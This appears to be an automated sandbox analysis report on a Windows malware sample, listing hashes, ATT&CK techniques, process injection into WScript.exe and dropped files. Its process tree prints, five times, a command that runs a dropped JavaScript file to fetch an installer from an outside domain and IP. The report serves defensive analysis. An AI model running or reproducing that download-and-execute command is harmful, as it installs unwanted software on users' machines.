684190ce96411d5810c3919dba15aae7adc438f53395a746be91ad722bea7ab2

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
11-05-2024 11:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe
Size

184KB
MD5

34644cec733aff31e7ab990ed1713171
SHA1

00955ecc036ca01745da57573950de26c144ac91
SHA256

684190ce96411d5810c3919dba15aae7adc438f53395a746be91ad722bea7ab2
SHA512

ea1416765024dcafe05529bb3658ee614fa26d92e602d773a6f769d169067a1a5569dc197250c87df5236b692403f49bdff2fd76010438a466c28111bc7f83dd
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3D:/7BSH8zUB+nGESaaRvoB7FJNndnq

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

Processes:

WScript.exeWScript.exeWScript.exeWScript.exeWScript.exe

flow	pid	process
6	2148	WScript.exe
8	2148	WScript.exe
10	2148	WScript.exe
13	2772	WScript.exe
14	2772	WScript.exe
16	2576	WScript.exe
17	2576	WScript.exe
19	2212	WScript.exe
20	2212	WScript.exe
22	580	WScript.exe
23	580	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe

description	pid	process	target process
PID 1684 wrote to memory of 2148	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2148	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2148	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2148	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2772	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2772	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2772	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2772	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2576	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2576	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2576	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2576	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2212	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2212	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2212	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 2212	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 580	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 580	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 580	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe
PID 1684 wrote to memory of 580	1684	34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe	WScript.exe

C:\Users\Admin\AppData\Local\Temp\34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\34644cec733aff31e7ab990ed1713171_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1684
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3015.js" http://www.djapp.info/?domain=vGDSEotuAW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=3D377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3015.exe
  2⤵
  - Blocklisted process makes network request
  PID:2148
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3015.js" http://www.djapp.info/?domain=vGDSEotuAW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=3D377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3015.exe
  2⤵
  - Blocklisted process makes network request
  PID:2772
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3015.js" http://www.djapp.info/?domain=vGDSEotuAW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=3D377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3015.exe
  2⤵
  - Blocklisted process makes network request
  PID:2576
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3015.js" http://www.djapp.info/?domain=vGDSEotuAW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=3D377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3015.exe
  2⤵
  - Blocklisted process makes network request
  PID:2212
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3015.js" http://www.djapp.info/?domain=vGDSEotuAW.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=3D377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3015.exe
  2⤵
  - Blocklisted process makes network request
  PID:580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
2a8fa256ce6a53132c6e1887aec2dd90

SHA1
3c3712696c81ffbf3f78767fa642115336718db0

SHA256
4372b48ab69f94556f8124623513fe956790e5250372c13577d51de0a309a2a6

SHA512
86c1a4da1b625219443ffa86cf04f4fa477746d0f1ff2de1c8c8605fcb4eed09b9aa3a7e7a64c8ad59c50b2a65bf25d5ef493bf9b06726ecb83aa9519ef9f11b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
65434b805c63da5e12e0b8d6681a3545

SHA1
b1d2c7a3db724646254ff0ec01f688a2cccdc8cd

SHA256
fafbaeac25b556201e87656bd00de947da47d2ffd60f2304a45726bbb69127ec

SHA512
31a9065cfbc39aba3d76b51047f18cb60b9f23398f6f38beff6b416f7923ce3810ad898456c9713081ccc59d5558e70a05a98e4df6538a5c7840e98844180490

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d26315f27a04cd54029a6ea5b1ca5e22

SHA1
c867ff1f2bfe5739c0c7fceb4b569b4205bb0dff

SHA256
7075edfc7eba68f77edb9b70cf74467d67b1d668a2eddcc6fbcf9f3afa28a8ac

SHA512
9fe2b5dec20088c779f69347d2756014d80e524b1954e0703ae0b289930e77452c52a206f0e7b02ee7c251f70661fdc93af5bba032e7d1ccd2f8629dda9fc2fe

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
1bdf1f8a52b520376d1de59fa3c196e3

SHA1
3cc4b9f4d9aade34775a1ad12945caf5ed055bab

SHA256
b7ba418270012170bfa8e1cdcdcabcad97da262440e87332a6238e54e6c908d8

SHA512
fa7c3ef63a468e93de9dbee768eddb38d1c5d72c3b9591cf22f1ea25feb0a8c9a77006866f927f05e60454c80110111353f4f0ad5ec5b09dc6f29a225dd8d385

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm

Filesize
6KB

MD5
ce5934c42370cf1d2d2dec018ff397ca

SHA1
e6b90e9411bc17fa349d941a7df096d1874aa3f8

SHA256
44158f9fa818b20d3401354ba72ab007a74f5afc3528bb89ce654f73ac3f51b7

SHA512
cc64d9bd9169525c9463e65959ae2d6222b2dd07c595b014cf7c9a7c507037c2df7a8f0b5e2f701fea7aca1efa7890b4caa7c1b40bd21ed4350cd1c51c09c9d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm

Filesize
40KB

MD5
4c3fd31a3ad5e45f567e8efdf27f04d2

SHA1
73f1eb03d06e18d814bb84d8ace741a407ce4504

SHA256
7a9b1e81e2b45f7d1e3c390f9beff77021c083afe7d79cfdcb7b9b0d36ee935c

SHA512
24b89b9930bd9431d19729509d41c44f415d32bf28ec6f3c0baa76fbabdd3b414e36d05ed96d89b4342e92bd1422da76373659844d53194add0c9a0c6689801c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

Filesize
6KB

MD5
0701ce389aab439979a91661fc1bd739

SHA1
ee81bff7e6b327d6ce651244e4657b9d601a1eee

SHA256
dd737b68530ad0b014e6a31b18efbaebd8bb43b59b4956857fac30bb9388991f

SHA512
0349debadcaf131adf88bab614696ed0bfb2102d8a63015d82261acfabf45d2a0ba94bb30b1061ab946e9d8f59eadf1538ae9fed2e81c460dbfeb11327ecbf25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

Filesize
6KB

MD5
598cd3d89081a7cb71c693eaac135a7e

SHA1
0ad3ef6be2d43c9682745f5244ba2ade8285b620

SHA256
a9deb504d04adebb114af40ff1a967fa033835374248d06bfa2a5bc9552a8f86

SHA512
9d35e6c737742658900c38af91a46696986e2e6f75e42f1cb53f0a2cebe75baacfe11ec1c04c0d99c030c14c33fdf34e668ea3803c965b8abb90c93b7ef5372e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab5FAD.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar781E.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf3015.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\BG8XWXSL.txt

Filesize
177B

MD5
9a970185a81681788c533e927f780fdf

SHA1
17c5ba6491d498c53e917db578f2f1a3f4738887

SHA256
700fd22029bcb4eff9c0c64c6672c4586a657ece4eaf4f521603b3161b863cbe

SHA512
ece32db68afefb81d112f29888ff27270645dc9673b5f48fcb9be25558ed95db0f5eb681c85fddc1bac997339d3092867160569c4c3bba2ccbfc4195c5292383

Download Submit